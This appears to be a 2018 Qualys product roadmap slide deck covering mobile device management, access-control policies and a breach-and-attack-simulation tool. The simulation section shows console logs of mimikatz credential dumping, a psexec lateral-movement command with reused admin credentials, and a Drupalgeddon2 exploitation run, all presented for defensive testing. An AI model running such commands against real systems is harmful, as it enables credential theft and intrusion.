Secure Enterprise Mobility

[Screenshot: Secure Enterprise Mobility inventory view, account "Qualys Demo". Tabs: Dashboard, Inventory, User, Profiles, Configurations. 810 total assets; the list is filtered to the last 30 days and shows 1-10 of 810, with "Action" and "Group assets by..." menus. Filter facets: Operating System (Android, iOS); Status (Ready for Re-enrollment, Enrolled, De-enrolled); Manufacturer (Lenovo, Motorola, Apple, Asus); Mode (Active, Inactive); Ownership (Corporate-Owned, Employee-Owned); Tags (Lenovo, Apple, Motorola, Asus, 2 more).]

Asset list as shown (columns: Last Seen | Asset | Model | OS / version | Status | Mode | Ownership | device identifier | Modified On):

  Oct 05, 2018 10:18 AM IST | Mark_Android_LENOVO      | Lenovo TAB 7      | Android 7.0                      | Enrolled | Active | Corporate-Owned | 865596033698730 | Oct 05, 2018
  Oct 04, 2018 06:53 PM IST | Jack_Android_LENOVO      | Lenovo TAB 7      | Android 7.0                      | Enrolled | Active | Corporate-Owned | 863854038393019 | Oct 04, 2018
  Oct 04, 2018 06:46 PM IST | Andy_Android_LENOVO      | Lenovo TAB 7      | Android 7.0                      | Enrolled | Active | Corporate-Owned | 864557031194883 | Oct 04, 2018
  Oct 04, 2018 06:44 PM IST | James_iOS_Apple          | Supervised iPhone | iOS 12.0                         | Enrolled | Active | Corporate-Owned | 353779083466914 | Oct 04, 2018
  Oct 04, 2018 06:33 PM IST | Richard_iOS_Apple        | iPhone 8          | iOS 11.2.5                       | Enrolled | Active | Corporate-Owned | 359497088355545 | Oct 04, 2018
  Oct 03, 2018 06:59 PM IST | Michael_Android_Motorola | Moto G (5S)       | Android (version unreadable)     | Enrolled | Active | Corporate-Owned | 911503554758228 | Oct 03, 2018
  Sep 28, 2018 06:15 PM IST | William_Android_Asus     | ZenFone AR        | Android 7.0                      | Enrolled | Active | Corporate-Owned | 358525085658221 | Sep 28, 2018
  Sep 25, 2018 06:10 PM IST | Charles_Android_Asus     | ZenFone Zoom S    | Android 7.x (version unreadable) | Enrolled | Active | Corporate-Owned | 351558072379425 | Sep 25, 2018

Each row also carries an inventory tag column (Android or iOS plus "1 more").
Asset Details: Station10_Tab1_LENOVO

[Screenshot: asset detail page. Left navigation (View Mode): Asset Summary, System Information, Network Information, Apps, CA Certificates, Security Tokens, Logs, Location, Actions. The header shows the asset name with a Rename control and the compliance indicators Unauthorized Root Access, Non-Compliant, Passcode Present, Encryption and Profiles.]

Asset Summary
  Asset Name: Lenovo TB-7504X (manufacturer Lenovo, Android v7.0)
  Status: Enrolled, flagged Non-Compliant
  Mode: Active
  Ownership: Corporate-Owned
  Communication Mode: Push
  Passcode: Not present
  Encryption: Yes
  Unauthorized Root Access: No
  Enrolled with AFW (Android for Work): Yes

Activity
  Enrolled On: Oct 9, 2018 11:29 AM PST
  Modified On: Oct 10, 2018 11:29 AM PST
  Last Seen: Nov 14, 2018 12:05 PM PST

Identification
  Username: fCgbjBD5
  User Email: -
  IP Address: 71.65.232.14

Last Location
  Fuquay-Varina, North Carolina, United States (Last Seen: Nov 14, 2018 12:05 PM PST)
Asset Details: Station10_Tab1_LENOVO - Apps

[Screenshot: Apps view of the same asset, with an app search box. Same left navigation as above.]

Recommended Apps (NAME | IDENTIFIER | VERSION | SYSTEM APP | STATUS | DETECTED ON)
  Auto Service Booking   | com.acme.auto.service.booking | 1.1 (2) | No | Missing | Nov 09, 2018 09:30 PM PST
  ACME Customer Feedback | com.acme.cust.feedback        | 1.0 (1) | No | Found   | Nov 09, 2018 09:30 PM PST

Device Apps (13), 1-13 of 13 (NAME | IDENTIFIER | VERSION | SYSTEM APP | USES MOCK LOCATION | INSTALLED ON | ACTION)
  TeamViewer              | com.teamviewerteamviewer.marke...    | 14.0.35 (140035)           | No  | No | Nov 09, 2018 04:37 PM PST | Uninstall
  Inkwire                 | com.koushikdutta.inkwire             | 1.0.1.7 (1499133600)       | No  | No | Nov 09, 2018 04:23 PM PST | Uninstall
  Gboard                  | com.google.android.inputmethod.la... | 7.7.12.219989447 (2...)    | Yes | No | Nov 09, 2018 12:49 PM PST |
  Gmail                   | com.google.android.gm                | 8.10.21.220187835...       | Yes | No | Nov 09, 2018 12:49 PM PST |
  oneAssistant            | nfo.oneassist                        | V25 (25)                   | No  | No | Nov 09, 2018 12:32 PM PST | Uninstall
  Home                    | com.google.android.apps.chromec...   | 2.6.6.19 (20606190)        | No  | No | Nov 09, 2018 10:12 PM PST | Uninstall
  Maps                    | com.google.android.apps.maps         | 10.3.1 (1003101040)        | Yes | No | Nov 08, 2018 10:26 PM PST |
  Google Play Movies & TV | com.google.android.videos            | 4.8.20.18 (40820181)       | Yes | No | Nov 06, 2018 10:40 PM PST |
  Gallery                 | com.oneplus.gallery                  | 2.10.10 (22270465)         | Yes | No | Nov 06, 2018 10:40 PM PST |
  Drive                   | com.google.android.apps.docs         | 2.18.432.04.40 (1843...)   | Yes | No | Nov 06, 2018 10:39 PM PST |
  SnoopSnitch             | de.srlabs.snoopsnitch                | 2.0.7 (35)                 | No  | No | Nov 05, 2018 12:02 PM PST | Uninstall
  YouTube                 | com.google.android.youtube           | 13.44.51 (134451340...)    | Yes | No | Nov 05, 2018 11:38 PM PST |
  Google Play Store       | com.android.vending                  | 12.4.14-all [0] [PR] 21... | Yes | No | Nov 05, 2018 11:35 PM PST |
  (one further row is unreadable in the capture)

In the capture only the non-system apps (TeamViewer, Inkwire, oneAssistant, Home, SnoopSnitch) carry the Uninstall action; the rows flagged as system apps show no action.
Security
  - Vulnerability Management
  - Asset Lockdown
  - Asset Hardening
  - Enterprise Integrations

Protection
  - Compliance Policies
      - On Enrollment
      - Continuous Monitoring
  - Enforcement and Remedial Actions
  - Policy Management
  - Containerization
Asset Details: Station10_Tab1_LENOVO - Actions

[Screenshot: Actions view. Left navigation: Asset Summary, System Information, Network Information, Apps, CA Certificates, Security Tokens, Logs, Location, Actions.]

Actions available for an enrolled asset:

Lock: Locks the screen of the asset. The asset is unusable until it is unlocked.

Message: Sends a message to the user of the asset. The message is delivered as a push notification.

Poll Mode: The asset contacts the Qualys server at the specified regular interval.

Push Mode: The Qualys server contacts the asset only when a new action is scheduled for it.

Buzz and locate: The asset buzzes and its current geo-location is sent to the server, provided Location Services are enabled.

Sync: Refreshes the asset information on demand.

De-enroll: The asset is de-enrolled and the server can no longer communicate with the device. Corporate data on the asset is deleted.

Factory Reset: The asset is factory reset. The server can no longer communicate with the asset.

Closed beta scope:
  - DIY Portal
  - Audit Control
  - Privacy
  - Ownership (Corporate/BYOD)
  - Transparency

© Qualys.

Feb 2019 - Closed Beta
Roadmap: multiple releases during 2019
Security Analytics & Orchestration

[Slide: three pillars]
  - Human Guided Response: playbooks for bi-directional ecosystem integration; BYOP (Bring-Your-Own-Playbook)
  - Policy-Driven Response & Cross-Product Correlation: additional context from 3rd-party sources; detect KNOWN threats with out-of-box rules
  - Advanced Analytics: detect UNKNOWN threats using machine learning; hacker behavioral analytics; predictive and prescriptive SOC

Security Analytics & Orchestration Apps (layered, top to bottom)
  - ML/AI: patterns, outliers, predictive SOC
  - Service Orchestration & Automation: ecosystem integration, playbooks, response
  - UEBA: user and entity behavior analytics
  - Threat Hunt: search, exploration, behavior graph
  - Security Analytics: anomaly, visualization, dashboard
  - Advanced Correlation: actionable insights, out-of-box rules
  - Qualys Security Data Lake Platform: data ingestion, normalization, enrichment, governance
  - Qualys Quick Connectors: network, security, server, endpoint, Qualys apps, third-party apps, cloud

Characteristics of a Data Lake: collect anything; dive in anywhere; flexible access; future proof.

What is a Security Data Lake?
  - A single data store (single source of truth) for structured and unstructured data
  - Data is transformed, normalized, and enriched (threat intelligence feed integration, GeoIP, etc.)
  - Data has governance, semantic consistency, and access controls
  - Store once / process once / use many times: apps, dashboards and data analytics; cross-product search, reporting and visualization; machine learning, forensics, etc.
Simplified View

[Diagram: the Qualys Security Data Lake Platform in the centre, fed by log connectors (security logs from multiple sources) and cloud connectors, and exposing behavior analytics, threat hunting, security analytics, RESTful API services, automation, orchestration and 3rd-party integration.]

[Diagram: Qualys apps (FIM, IOC, Patch) and the Cloud Agent feed a pipeline of ingestion, normalization, aggregation, metadata enrichment and ML processing; on top sit graphs/topology, reports, dashboards, search and correlation, threat hunting, anomaly detection, user and entity behavior analytics, and orchestration, automation and alerting.]
Agenda
  - What is Secure Access Control
  - Use-cases
  - Capabilities
  - Policy-based orchestration
  - Operationalizing Secure Access Control
  - Mockups

Use Cases
  - Block vulnerable assets from accessing critical network resources
  - Limit access (e.g. quarantine) of vulnerable assets
  - Grant access to resources only on a need basis; block everything else
  - Automated asset attribute processing and enforcement without the need for manual action


Use Cases: Vulnerabilities - Quarantine assets if vulnerable

[Diagram: when a vulnerability is found on an asset, SAC moves it into quarantine. The diagram labels what a quarantined asset may still reach: the DHCP server, Active Directory, the enterprise servers, a remote data center (LDC-01) and the Windows Update destinations listed below.]

Windows Update destinations allowed from quarantine:
  *.windowsupdate.microsoft.com
  http://*.update.microsoft.com
  https://*.update.microsoft.com
  http://*.windowsupdate.com
  http://download.windowsupdate.com
  http://download.microsoft.com
  (one further entry, http://...stats.update.microsoft.com, is truncated in the capture)
Use Cases: Asset Inventory - Access control using asset inventory attributes

[Diagram: managed and unmanaged assets are matched on inventory attributes (System Information, Hardware, Operating System, Services, Network Interfaces, Open Ports, Software Inventory, Software Lifecycle) and the matching policy applies one of the actions Block, Allow, Quarantine, Assign ACL or Assign VLAN.]
Use Cases: Compliance - Block assets which fail compliance

[Diagram: policy inputs and the enforcement actions they drive. Inputs: Compliance (controls, compliance mandates, control policies); Indications of Compromise (file, network, process, registry and mutex incidents; malware family, category and score); Threat Protection (actively exploited, exploit kit, easy exploit); File Integrity (actor, incidents). Action targets: managed assets and Internet of Things devices. Actions: Block, Allow, Quarantine, Assign ACL, Assign VLAN.]
Policy-based Orchestration

[Diagram: a Security Control (the condition a Qualys app detects) drives an Access Control decision for an asset, identified by MAC address (6F:1A:5E:2B:4D:3C) or hostname (server.company.com).]
Best of Two Worlds

In-line appliance:
  - Reliable first-hand data
  - Low latency for data collection and enforcement

Out-of-band (switches):
  - Multiple enforcement options
  - Traffic-volume agnostic

SAC offers both modes: powerful together, a unique value proposition.
Operationalizing Secure Access Control

Qualys Hardware + SSN

[Diagram: network topology (modem, switches, SAC appliance); the labels are not recoverable from the capture.]

Secure Access Control (SAC)
  - How do I trigger SAC policies from Qualys Cloud Apps?
  - How do I view and define policies?
  - How do I troubleshoot an asset?

1. Trigger

Indicators of Compromise DASHBOARD HUNTING INCIDENTS ASSETS RULES g-frame-standard (123) © تع‎ 


Alerts 


Q Search Last 30 days = 
64K x 
Total Events 05 
04 i 
0 
May 15 May 30 Now 
TYPE ο 1. 3 
file 1.4K 
mutex 300 TIME OBJECT ASSET SCORE 
network 200 
process 300 a minute ago déi WmiPrvSE.exe 58 WIN8-1-UN-PATCH 
registry 100 12:10:17 AM C:\Windows\system32\wbem\wmiprvse.exe 10.115.76.190 
y 2 more 
7 8 minute ago 8 \BaseNamedObjects\F659A567-8ACB-4E4A-92A7-5C2DD18... 58 WIN8-1-UN-PATCH 
EVENT ACTION 12:10:17 AM taskhost.exe 10.115.76.190 
connected 400 a minute ago Fei SearchProtocolHost.exe as WIN8-1-UN-PATCH 
created 300 12:10:17 AM C:\Windows\system32\SearchProtocolHost.exe 10.115.76.190 
deleted 200 
disconnected 123 a minute ago Pad undefined : 0 Quick Actions v H WIN8-1-UN-PATCH 
12:10:17 AM UDP CONNECTION - CLOSED by svchost.exe 10.115.76.190 
SCORE Event Details 
a minute ago déi taskhost.exe mm  WIN8-1-UN-PATCH 
10 564 a: UE Asset Details "um 
8 421 12:10:17 AM C:\Windows\system32\taskhost.exe 10.115.76.190 
4 300 we R 
a minute ago Ped undefined : 0 mm  WIN8-1-UN-PATCH 
3 288 Quarantin = 
12:10:17 AM UDP CONNECTION - CLOSED by svchost.exe uaranune 10.115.76.190 
n Delete File 
Processor 164 a minute ago déi SearchFilterHost.exe go WIN8-1-UN-PATCH 
Memory Ka 12:10:17 AM C:\Windows\system32\SearchFilterHost.exe 10.115.76.190 Qualys. 
HDD E We ` μα. 


Quarantine Asset (dialog opened from the IOC quick action)

Policy: (o) Auto Create New Policy   ( ) Select From Existing Policies

Selecting from existing policies lists, for example:
  - Quarantine for all MacOS: policy to quarantine all Mac OS vulnerability
  - Block all wannacry: policy to block all WannaCry vulnerable assets
  - Quarantine Policy for QSC: policy to block all QSC vulnerable assets

Auto-creating a policy pre-fills:
  Policy Name: Quarantine policy for Asset: 10.19.57.65
  Description: This is an auto created Quarantine policy for Asset


2. View & Define
Secure Access Control - Policies (tabs: Dashboard, Policies, Monitoring, Configuration; user John Doe)

[Screenshot: policy list, 79 total policies, showing 1-50. Filter facets: Status (Enabled 07, Disabled 05); Dynamic Asset Criteria (High Vulnerability Mac 2, All Corporate Assets 2, All Linux Assets 2, All Mac Assets 2, All Laptops 1); a second asset-list facet (Management Assets 2, All Printers 1, IOT Devices 2, Blacklisted Hosts 2, Blacklisted Mac Addresses 1); Rule Type (Outbound 05, Inbound 07); Actions (Allow 07, Deny 22, VLAN Switch 16); Service (HTTP 05, SSH 07, ANY 22, UDP 16); Protocols (TCP 05, UDP 07).]

SEQ | STATUS  | POLICY                                               | HOSTS / RULESET                        | ELIGIBLE ON (asset criteria) | ASSETS
1   | Enabled | Quarantine Policy for QSC                            | VLAN 20                                | High Vulnerability Mac       | 48
2   | Enabled | Automatic Policy for Asset: 10.19.57.65              | ACL: ACL Name example                  | WannaCry Assets Criteria     | 22
3   | Enabled | Quarantine all Mac OS High Sierra Vulnerability...   | VLAN 20                                | High Vulnerability Mac       | 48
3   | Enabled | Block all WannaCry Vulnerable assets                 | ACL: ACL Name example                  | WannaCry Assets Criteria     | 29
4   | Enabled | Notify all Heartbleed Vulnerable openSSL servers     | Traffic Rules: Quarantine Ruleset      | Heartbleed Asset Criteria    | 35
5   | Enabled | Quarantine VLAN if OS is not updated                 | Traffic Rules: OS Update Check Ruleset | Assets Missing OS Update     | (unreadable)
6   | Enabled | Quarantine VLAN if Antivirus is not updated          | Traffic Rules                          | Assets Missing AV Updates    | 11
7   | Enabled | Access to engineering resources for engineering team | Traffic Rules                          | High Vulnerability Mac       | 322
8   | Enabled | Policy for feedback Kiosk at reception               | Traffic Rules: 3 Rules                 | High Vulnerability Mac       | 123
9   | Enabled | Block all outbound connections to Chinese servers    | Traffic Rules: 3 Rules                 | High Vulnerability Mac       | 123
10  | Enabled | Deny access to all vulnerable laptops                | Traffic Rules: 3 Rules                 | High Vulnerability Mac       | 72
11  | Enabled | Quarantine Vulnerable servers                        | Traffic Rules: 3 Rules                 | High Vulnerability Mac       | 48

(Sequence numbers are as shown in the mockup, which lists "3" twice.)

WannaCry Asset Criteria (criteria editor)

[Screenshot: "Create New: Criteria". Criteria types: User, Hosts/Assets, Vulnerability, Compliance, Malware, Location. Each type offers Saved Criteria or Custom Criteria. The field-level help is still placeholder copy in the mockup ("Something about what the user will need to know about the fields below").]

Rule 1: New or Active Vulnerability
  When a vulnerability is:  [x] New   [ ] Fixed   [x] Active   [ ] Reopened

Vulnerability Criteria
  Type:        Confirmed | Potential
  Severity:    1 - 5 (selectable)
  Title:       Select
  QID:         Is in the list -> 1027
  CVE:         Select
  CVSS Score:  Select
  + Add Criteria
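The criteria form above combines a vulnerability status transition (New, Fixed, Active, Reopened) with finding attributes (Confirmed/Potential, severity, QID list, CVE, CVSS). The Python below is an added example, not Qualys code: it derives the status of each (asset, QID) pair from a series of scans and then evaluates a criteria block shaped like "WannaCry Asset Criteria" to decide which assets the policy is eligible on. The status semantics, the `Finding` fields, the severity and CVSS floors, the constructed scan history and the use of QID 1027 (the value in the mockup, not a real WannaCry QID) are all assumptions.

```python
"""Vulnerability status per (asset, QID) across scans, then SAC criteria evaluation.

Added example, not Qualys code. Criteria fields follow the WannaCry Asset Criteria form;
status semantics, the Finding fields, thresholds and the scan data are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    asset: str
    qid: int
    vtype: str       # "Confirmed" or "Potential"
    severity: int    # 1..5
    cvss: float


def vuln_status(detections):
    """detections: chronological booleans (QID found in that scan?), newest last.
    New      - found now, never before
    Active   - found now and in the previous scan
    Reopened - found now, missing in the previous scan but seen earlier
    Fixed    - seen before, not found now
    """
    now = detections[-1]
    prev = detections[-2] if len(detections) > 1 else False
    seen_before = any(detections[:-1])
    if now:
        if not seen_before:
            return "New"
        return "Active" if prev else "Reopened"
    return "Fixed" if seen_before else "NotDetected"


@dataclass(frozen=True)
class VulnCriteria:
    statuses: frozenset     # status transitions that trigger the rule
    types: frozenset        # Confirmed and/or Potential
    min_severity: int
    qids: frozenset         # empty = any QID
    min_cvss: float


# The mockup's rule: New or Active, Confirmed, QID in [1027]; the floors are assumed.
WANNACRY_CRITERIA = VulnCriteria(
    statuses=frozenset({"New", "Active"}), types=frozenset({"Confirmed"}),
    min_severity=4, qids=frozenset({1027}), min_cvss=0.0)


def finding_matches(criteria, finding, status):
    return (status in criteria.statuses
            and finding.vtype in criteria.types
            and finding.severity >= criteria.min_severity
            and (not criteria.qids or finding.qid in criteria.qids)
            and finding.cvss >= criteria.min_cvss)


def eligible_assets(criteria, scans):
    """scans: chronological list of scan results, each a set of Finding.
    Returns {asset: [(qid, status), ...]} for assets the policy is eligible on."""
    latest = {}                                   # newest Finding per (asset, qid)
    for scan in scans:
        for f in scan:
            latest[(f.asset, f.qid)] = f
    eligible = defaultdict(list)
    for (asset, qid), finding in sorted(latest.items(), key=lambda kv: kv[0]):
        detections = [any(f.asset == asset and f.qid == qid for f in scan) for scan in scans]
        status = vuln_status(detections)
        if finding_matches(criteria, finding, status):
            eligible[asset].append((qid, status))
    return dict(eligible)


# Constructed three-scan history, oldest first.
def _f(asset, qid=1027, vtype="Confirmed", severity=5, cvss=8.1):
    return Finding(asset, qid, vtype, severity, cvss)


SAMPLE_SCANS = [
    {_f("WIN8-1-UN-PATCH"), _f("FILE-02"), _f("HR-07"), _f("KIOSK-01", vtype="Potential")},
    {_f("WIN8-1-UN-PATCH"), _f("KIOSK-01", vtype="Potential")},
    {_f("WIN8-1-UN-PATCH"), _f("HR-07"), _f("KIOSK-01", vtype="Potential"),
     _f("LAB-05"), _f("DB-03", qid=2001, cvss=9.8)},
]

if __name__ == "__main__":
    for asset, hits in eligible_assets(WANNACRY_CRITERIA, SAMPLE_SCANS).items():
        print(asset, hits)
```

On the sample, WIN8-1-UN-PATCH (Active) and LAB-05 (New) become eligible; FILE-02 drops out as Fixed, KIOSK-01 is excluded as Potential and DB-03 has a different QID. The caveat is HR-07: it was fixed after the first scan and is back in the third, so its status is Reopened, and a rule that selects only New and Active, exactly as the mockup's form does, lets it keep its network access. Include Reopened in the status set unless there is a deliberate reason not to.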


3. Troubleshoot

Secure Access Control - Monitoring (tabs: Dashboard, Policies, Monitoring, Configuration; user John Doe)

[Screenshot: Monitoring view, query interfaces.address "10.19.57.65", 79 total devices, showing 1-50 of 79. Columns: Assets, Operating System, Last Activity, Status, Last Policy Applied, Policies Enforced, Policies Eligible.]
  WIN8-1-UN-PATCH (10.19.57.65) | Microsoft Windows 6.1 SP1 | john@quays... 05:10:22 AM | Online | Allow Internet Access | 5 enforced | 6 eligible
View Details: WIN-HL64HBLJP02

[Screenshot: asset detail page. View Mode navigation: Summary, System Information, Agent Summary, Network Information, Open Ports, Installed Software, Vulnerabilities, Threat Protection, File Integrity Monitoring, Indicator of Compromise, Patch Management, Security Access Control.]

Asset Summary
  WIN-HL64HBLJP02 (Rename) - Microsoft Windows 7 Enterprise 6.1.7601 Service Pack 1 - VMware, Inc.
  Vulnerabilities: 188 (security risk, avg: 3.4)
  IOC Incidents: (count not readable)
  FIM Events: 17.2M (Delete 1.5M, Create 1.4M, Content 1M, Attributes 240, Rename 186, Security 112)
  Policy Compliance: 73% passing (avg)
  SSL Certificate Grade: 2 failing
  Missing Patches: 6

Identification
  DNS Hostname: WIN-HL64HBLJP02
  FQDN: WIN-HL64HBLJP02.WORKGROUP
  NetBIOS Name: WIN-HL64HBLJP02
  IPv4 Addresses: 172.31.38.237
  IPv6 Addresses: fe80:0:0:0:9c26:6441:5eaa:796e
  Asset ID: 35046941
  Host ID: 28845831

Activity
  Last User Login: AKCtech
  Last System Boot: September 9, 2017 4:51 PM
  Created On: March 1, 2017 10:33 AM
  Last Checked In: 8 mins ago (8:32 AM)

Last Location
  Columbus, Ohio, United States; Last Seen: 8 mins ago (8:32 AM)
  Cloud Agent IP address: 52.14.169.187

Tags: Test Group, AWS, Cloud Agent, Amazon, US East, Patch Test, AWS Servers


View Details: WIN-HL64HBLJP02 - Security Access Control

[Screenshot: the asset's Security Access Control tab (same View Mode navigation as above). Policies recently applied to this asset:
  Allow internal server access to all e... - Nov 09, 2018 at 9:17 AM
  Allow internet access to all employe... - Nov 09, 2018 at 9:15 AM
  Prevent access to finance and payroll server
  Quarantine VLAN if Antivirus is not updated
Policy Timeline (policies P1-P5 across the day, 9:00 AM to now; one marker reads "Quarantine Policy Applied", Oct 12, 2018, 2:13 AM) and Policy Eligibility Timeline over the same range.
Last 5 Enforced Policies: Access to engineering resources fo... - Nov 09, 2018 at 10:05 AM.
Never Enforced Eligible Policies: Outbound connections to malicious websites.]


Problems
  - Lack of confidence in the effectiveness of security controls
  - Limited assessment scope and capabilities
  - Red Team operations are expensive, not scalable, and not evaluated for completeness
  - Blue Teams are blind to the impact of new exploits and attacks on their existing security controls


Breach and Attack Simulation

[Screenshot: Breach & Attack Simulation dashboard (tabs Dashboard, Scans, Assets, Campaigns; user mdani), filtered by asset tags, last 30 days. Headline counters: Total Assets 943; Breached (not readable); Available Campaigns 20; Techniques 2638. Tactics across the top: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Collection, Exfiltration, Command and Control.
Asset Breakdown by Severity: 1.1K total (high/medium/low split not readable).
Top 5 Failing Techniques: Exploit Public-Facing Application 84; Logon Scripts 83; Email Collection 73; Application Shimming 65; File System Permissions Weakness 64.
Scans by Status: 22 total.
Most Failing Campaigns: exploit.compliance.eternalblue (Feb 15, 2018) 84; weakness.compliance.password.reuse (Jun 02, 2018) 83; exploit.vulnerability.drupalgeddon2 (Aug 23, 2018) 73; weakness.exploit.msword.phish (Jan 01, 2018) 65.
Tactics Overview by Failing Techniques: 11 tactics vs. 187 scanned techniques (bar values 82 and 33 partly readable).]

Automated simulation of real-world attacks.

Technical Approach
  - Automated simulation of real-world attacks
  - Scale security assessments across the entire enterprise
  - Transition towards a defense strategy based on offensive techniques
  - Real-time insights mapped to the MITRE ATT&CK framework
  - Continuously measure security control drift over time
Qualys Breach and Attack Simulation (v0.1) - console

[Screenshot: the QAttack console, an interface to adversary agents deployed through the Qualys Cloud Agent. Commands listed in the help menu:
  Connect to an agent
  List connected agents
  Show this help menu
  Kill an active agent connection
  List files in current directory
  Get current working directory
  Unzip a file
  Download a file from the asset
  Upload a file to the asset
  Show IP-MAC pairs from system ARP table
  Execute a command on the asset
  Scan and show status for top 1024 TCP ports on the asset
  Collect metadata about the asset
  Cleanup all traces of agent from the asset
  Exit the current agent connection

Technique modules by tactic:
  Initial Access:
    T1190 - drupalgeddon2   Run the Drupalgeddon2 exploit
    T1190 - apachestruts    Run the Apache Struts S2-057 exploit
  Execution:
    T1035 - psexec          Run PsExec for command execution
    T1191 - cmstp           Run CMSTP.exe with a malicious .inf file for file execution
    T1173 - windde          Use DDE to run arbitrary commands
  Persistence: (entries not readable)]

Breach & Attack Simulation: Credential Harvesting and Reuse

1. Uploading / running mimikatz
2. Extracting stored credentials
3. Lateral movement

Tail of the mimikatz output captured by the agent (machine account, ssp and credman sections), followed by the agent's T1003 log and the credential cache. Passwords are masked as they appear on the slide.

  kerberos :
   * Username : vswin2k8r2sp1be$
   * Domain   : WORKGROUP
   * Password : (null)
  ssp :
  credman :

  mimikatz(commandline) # exit

  [20/Nov/2018] 13:58:31 PM [T1003][INFORMATION]:
  [20/Nov/2018] 13:58:32 PM [CLEANUP]: Deleted file mimikatz.exe (SHA1: d40a48094c1f21fef892f27a8b6a7ed2bb0c27f)
  [20/Nov/2018] 13:58:33 PM [T1003][INFORMATION]: Passwords extracted: 4
  [20/Nov/2018] 13:58:34 PM [T1003][INFORMATION]: Test successful

  (agent #1) >>> cache
  [*] Showing current cache:
  [+] passwords:
      Type: tspkg
      Username: Administrator
      Password: Abcxxxxxxx5
      Domain: VSWIN2K8R2SP1BE

      Category: local
      Type: wdigest
      Username: Administrator
      Password: Abcxxxxxxx5
      Domain: VSWIN2K8R2SP1BE

      Category: local
      Type: kerberos
      Username: Administrator
      Password: Abcxxxxxxx5
      Domain: VSWIN2K8R2SP1BE

      Category: application:proxy
      Type: credman
      Username: Administrator
      Password: Abcxxxxxxx5
      Domain: VSWIN2K8R2SP1BE

  (agent #1) >>> lateral

  [20/Nov/2018] 14:32:-- PM [STATUS]: Testing for T1077: Windows Admin Share
  [20/Nov/2018] 14:32:-- PM [SHARE-SCAN]: Scanning for shares on: 192.168.1.101, 192.168.1.102
  [20/Nov/2018] 14:32:30 PM [T1077][INFORMATION]: Windows admin$ share detected on 192.168.1.101
  [20/Nov/2018] 14:32:31 PM [T1077][INFORMATION]: Windows admin$ share detected on 192.168.1.102
  [20/Nov/2018] 14:32:-- PM [T1077][INFORMATION]: Admin shares enumerated
  [20/Nov/2018] 14:32:33 PM [STATUS]: Testing for T1078: Valid Accounts
  [20/Nov/2018] 14:32:34 PM [T1078][INFORMATION]: Testing for passwords retrieved using T1003
  [20/Nov/2018] 14:32:35 PM [STATUS]: Windows admin$ share detected on 192.168.1.101
  [20/Nov/2018] 14:32:36 PM [T1078][INFORMATION]: Credentials detected administrator: Abcxxxxxxx5
  [20/Nov/2018] 14:32:-- PM [STATUS]: Attempting lateral movement using re-used credentials
  [20/Nov/2018] 14:32:-- PM [STATUS]: Testing for T1035: Service Execution
  [20/Nov/2018] 14:32:38 PM [T1035][INFORMATION]: Read psexec.exe location from configuration: \\software\psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)
  [20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Attempting remote file copy: copy /y \\192.168.1.100\ds345gfgd.exe \\192.168.1.101\c$\
  [20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: command psexec.exe -accepteula -nobanner -d \\192.168.1.101 -u administrator -p Abcxxxxxxx5 s345gtg
  [20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Test successful.
  [20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: End execution: psexec.exe
  [20/Nov/2018] 14:32:39 PM [CLEANUP]: Deleted file psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)
  [20/Nov/2018] 14:32:40 PM [STATUS]: All tests complete.

  (agent #1) >>>

  (Seconds shown as "--" were unreadable in the capture.)


Live View: Password Reuse

[Screenshot: live view of the scan "Password Reuse", campaign weakness.compliance.password.reuse, status InProgress. Left facets: Tactics (Initial Access, Execution, Persistence, Privilege Escalation, and 6 more), Status (Breached, Safe, Error), Operating System (Windows Server 2012, Windows Server 2012 R2, Windows Server 8.1 as labelled, Windows 7 SP1, Windows 10 Enterprise). Centre: attack graph from the entry host 192.168.1.100 to 192.168.1.101 and on to 192.168.1.102-107; the breakdown by status shows 34% breached. Selected node: IP 192.168.1.101, hostname THINKPAD-98689-M710, username CORP/user1, processor Intel Core i7-7770, privileges administrator.]

Breached: 192.168.1.101 - THINKPAD-98689-M710

  [11/10/2018] 10:01:11 AM [INFORMATION]: QAttack agent initialized via QAgent. Process name: adfg32dsff.exe
  [11/10/2018] 10:01:12 AM [INFORMATION]: Current QAttack agent privileges: user
  [11/10/2018] 10:01:15 AM [SYSTEMINFO]: Currently logged on user: CORP/user1
  [11/10/2018] 10:01:15 AM [SYSTEMINFO]: Operating system: Windows 7 SP1 (OS Build 6.1.7601)
  [11/10/2018] 10:01:15 AM [SYSTEMINFO]: Processor: Intel(R) Core(TM) i7-7700 CPU @ 3.60GHz
  [11/10/2018] 10:01:15 AM [SYSTEMINFO]: Installed memory (RAM): 12.0 GB

Breach & Attack Simulation: Drupalgeddon2 (CVE-2018-7600)

Console transcript. The timestamp column (20/Nov/2018, 13:54 to 13:55 PM) was split from the messages in the capture, so only the date is reproduced except where the full stamp survived.

  >>> use 1
  [+] Opening up live session with agent #1 (192.168.1.100)
  (agent #1) >>> drupalgeddon2
  Please provide a URL for a public facing Drupal webapp (https://corpdomain.tld/blog):

  [20/Nov/2018] [STATUS]: Testing for T1190: Exploit Public-Facing Application
  [20/Nov/2018] [T1190][INFORMATION]: Found public facing Drupal web host: https://corpdomain.tld/blog
  [20/Nov/2018] [T1190][INFORMATION]: Drupal 7.46 detected via https://corpdomain.tld/blog/CHANGELOG.txt
  [20/Nov/2018] [T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600
  [20/Nov/2018] [T1190][INFORMATION]: Dropped file: sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
  [20/Nov/2018] [STATUS]: Waiting for connection from sda32fds.exe
  [20/Nov/2018] [STATUS]: Connection received on TCP 32282
  [20/Nov/2018] [STATUS]: Process information sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
  [20/Nov/2018] [INFORMATION]: Current QAttack agent privileges: user
  [20/Nov/2018] [SYSTEMINFO]: Currently logged on user: CORP/user1
  [20/Nov/2018] [SYSTEMINFO]: Operating system: Windows 7 SP1 (OS Build 6.1.7601)
  [20/Nov/2018] [SYSTEMINFO]: Processor: Intel(R) Core(TM) i7-7700 CPU @ 3.60GHz
